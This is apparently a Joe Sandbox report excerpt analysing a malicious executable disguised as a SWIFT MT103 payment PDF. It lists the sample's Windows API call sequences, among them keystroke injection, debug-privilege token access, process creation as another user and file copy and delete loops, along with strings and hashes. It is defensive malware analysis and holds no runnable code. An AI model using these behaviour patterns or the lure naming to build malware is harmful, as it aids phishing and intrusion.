                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                        • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                        • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                        • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 03F23729
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1717761214.0000000003F21000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F21000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3f21000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                        • Instruction ID: fb8b6601ac3603c8c5ca89b4738023192c507bb6ea66cb77e899fe79927d9676
                                                        • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                        • Instruction Fuzzy Hash: D0E0BF7494410DEFDB00DFA8D54D6DD7BB4EF04701F1005A1FD05D7680DB309E549A62
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 03F23729
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1717761214.0000000003F21000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F21000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3f21000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 3cf75fdf98efae9ae4871b9a600eee32e8a81afcc8a6ce707becf23ded23e045
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: DEE0467594510DDFDB00DFB8D54D69D7FB4EF04701F1045A5FD05D2280D6719D509A62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                        • API String ID: 0-4260964411
                                                        • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                        • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                        • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                        • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                        APIs
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                        • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                        • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                        • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                        • SendMessageW.USER32 ref: 0047C2FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$State$LongProcWindow
                                                        • String ID: @GUI_DRAGID$F
                                                        • API String ID: 1562745308-4164748364
                                                        • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                        • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                        • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                        • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                        • IsIconic.USER32(?), ref: 004375E1
                                                        • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                        • SetForegroundWindow.USER32(?), ref: 004375FD
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                        • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                        • SetForegroundWindow.USER32(?), ref: 00437645
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                        • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                        • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                        • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                        • SetForegroundWindow.USER32(?), ref: 004376AD
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 3778422247-2988720461
                                                        • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                        • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                        • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                        • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                        APIs
                                                        • _memset.LIBCMT ref: 0044621B
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                        • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                        • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                        • _wcslen.LIBCMT ref: 0044639E
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                        • _wcsncpy.LIBCMT ref: 004463C7
                                                        • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                        • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                        • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                        • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                        • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                        • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                        • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                        • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2173856841-1027155976
                                                        • Opcode ID: 777cd80c1d6b5d217fe7e9fe42dba9a6516431262556143e3c53b921cbffc7c2
                                                        • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                        • Opcode Fuzzy Hash: 777cd80c1d6b5d217fe7e9fe42dba9a6516431262556143e3c53b921cbffc7c2
                                                        • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                        APIs
                                                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,?,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,004A8E80,C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe,0040F3D2), ref: 0040FFCA
                                                          • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                          • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                          • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                          • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                        • _wcscat.LIBCMT ref: 0044BD96
                                                        • _wcscat.LIBCMT ref: 0044BDBF
                                                        • __wsplitpath.LIBCMT ref: 0044BDEC
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                        • _wcscpy.LIBCMT ref: 0044BE73
                                                        • _wcscat.LIBCMT ref: 0044BE85
                                                        • _wcscat.LIBCMT ref: 0044BE97
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                        • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                        • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                        • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                        • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                        • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 2188072990-1173974218
                                                        • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                        • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                        • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                        • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                        APIs
                                                        • __invoke_watson.LIBCMT ref: 004203A4
                                                          • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                          • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                          • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                          • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                          • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                          • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                        • __get_daylight.LIBCMT ref: 004203B0
                                                        • __invoke_watson.LIBCMT ref: 004203BF
                                                        • __get_daylight.LIBCMT ref: 004203CB
                                                        • __invoke_watson.LIBCMT ref: 004203DA
                                                        • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                        • _strlen.LIBCMT ref: 00420442
                                                        • __malloc_crt.LIBCMT ref: 00420449
                                                        • _strlen.LIBCMT ref: 0042045F
                                                        • _strcpy_s.LIBCMT ref: 0042046D
                                                        • __invoke_watson.LIBCMT ref: 00420482
                                                        • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                        • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                        • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                          • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                          • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                          • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                          • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                          • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                        • __invoke_watson.LIBCMT ref: 004205CC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                        • String ID: S\
                                                        • API String ID: 4084823496-393906132
                                                        • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                        • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                        • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                        • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                        • __swprintf.LIBCMT ref: 00434D91
                                                        • _wcslen.LIBCMT ref: 00434D9B
                                                        • _wcslen.LIBCMT ref: 00434DB0
                                                        • _wcslen.LIBCMT ref: 00434DC5
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                        • _memset.LIBCMT ref: 00434E27
                                                        • _wcslen.LIBCMT ref: 00434E3C
                                                        • _wcsncpy.LIBCMT ref: 00434E6F
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                        • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                        • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 302090198-3457252023
                                                        • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                        • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                        • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                        • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                        APIs
                                                          • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                        • GetLastError.KERNEL32 ref: 004644B4
                                                        • GetCurrentThread.KERNEL32 ref: 004644C8
                                                        • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 1312810259-2896544425
                                                        • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                        • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                        • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                        • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                        APIs
                                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                        • __wsplitpath.LIBCMT ref: 004038B2
                                                          • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                        • _wcscpy.LIBCMT ref: 004038C7
                                                        • _wcscat.LIBCMT ref: 004038DC
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                          • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                          • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                        • _wcscpy.LIBCMT ref: 004039C2
                                                        • _wcslen.LIBCMT ref: 00403A53
                                                        • _wcslen.LIBCMT ref: 00403AAA
                                                        Strings
                                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                        • Unterminated string, xrefs: 0042B9BA
                                                        • Error opening the file, xrefs: 0042B8AC
                                                        • _, xrefs: 00403B48
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                        • API String ID: 4115725249-188983378
                                                        • Opcode ID: d1f6f7880eae355a62415ba06b8750735b88dc7e89a2b24455e75e37b2783e3b
                                                        • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                        • Opcode Fuzzy Hash: d1f6f7880eae355a62415ba06b8750735b88dc7e89a2b24455e75e37b2783e3b
                                                        • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
